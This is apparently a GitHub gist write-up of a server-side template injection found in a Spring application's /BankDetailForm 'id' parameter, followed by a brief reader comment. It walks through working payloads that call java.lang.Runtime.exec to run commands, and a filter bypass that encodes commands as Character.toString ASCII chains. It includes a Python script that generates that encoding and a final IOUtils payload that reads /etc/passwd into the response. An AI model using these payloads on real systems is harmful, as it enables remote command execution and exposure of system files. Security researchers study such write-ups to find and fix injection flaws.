Created
April 3, 2019 06:11
-
-
Save nani1337/8010d7a625e5f90ec026bab32ffb5cc2 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| My input of abc${12*12}abc was reflected as abc144abc. Then I wanted to perform a simple id and get the result on screen. I proceeded with the following payload: | |
| URI: /BankDetailForm?id=${T(java.lang.Runtime).getRuntime().exec('id')} | |
| Payload: ${T(java.lang.Runtime).getRuntime().exec('id')} | |
| After going through some Java classes I stumbled upon the following: | |
| java.lang.Character.toString(105) | |
| -> prints the characer 'i' | |
| Now I need to concat the letter ‘d’ and I’m golden. Again concat() is a method and i’m going to nest the character.toString inside it as well. | |
| java.lang.Character.toString(105).concat(T(java.lang.Character).toString(100)) | |
| -> prints the characters 'id' | |
| Now crafting the final payload, I get the following: | |
| https://<domain>/BankDetailForm?id=${T(java.lang.Runtime).getRuntime().exec(T(java. | |
| lang.Character).toString(105).concat(T(java.lang.Character).toString(100)))} | |
| The getRuntime() method returns the runtime object which we got on screen. Now we have some sort of a Blind RCE with which we can run any commands. I wanted to go a step further and get the output on screen (just for fun). At this point I wanted to do a cat etc/passwd and print the result onto the Whitelabel Error page. This meant for every character I would need to write its ASCII equivalent in the format concat(T(java.lang.Character).toString(<ascii value>)). Wrote a quick sloppy python script to acheive this: | |
| Python Script: | |
| #!/usr/bin/env python | |
| from __future__ import print_function | |
| import sys | |
| message = raw_input('Enter message to encode:') | |
| print('Decoded string (in ASCII):\n') | |
| for ch in message: | |
| print('.concat(T(java.lang.Character).toString(%s))' % ord(ch), end=""), | |
| print('\n') | |
| Now to get the output of cat etc/passwd in the response, we will use the IOUtils class and call the toString() method. We can pass an input stream to this method and get the contents of the stream as a response. | |
| ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).get | |
| Runtime().exec(T(java.lang.Character).toString(99).concat(T(ja | |
| va.lang.Character).toString(97)).concat(T(java.lang.Character).toStri | |
| ng(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.la | |
| ng.Character).toString(47)).concat(T(java.lang.Character).toString(10 | |
| 1)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.C | |
| haracter).toString(99)).concat(T(java.lang.Character).toString(47)).c | |
| oncat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character). | |
| toString(97)).concat(T(java.lang.Character).toString(115)).concat | |
| (T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toStrin | |
| g(119)).concat(T(java.lang.Character).toString(100))).getInputStream())} | |
| The payload became quite huge. To sum up, I used the Apache IOUtils library. I converted cat etc/passwd into ASCII characters using the character class, passed this value to the exec() method and got the input stream and passed it to the toString() method of IOUtils class. Awesome isnt it. I tried this on the remote box and got the following. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Thanks, I was blowing my mind trying to figure it out. Great explanation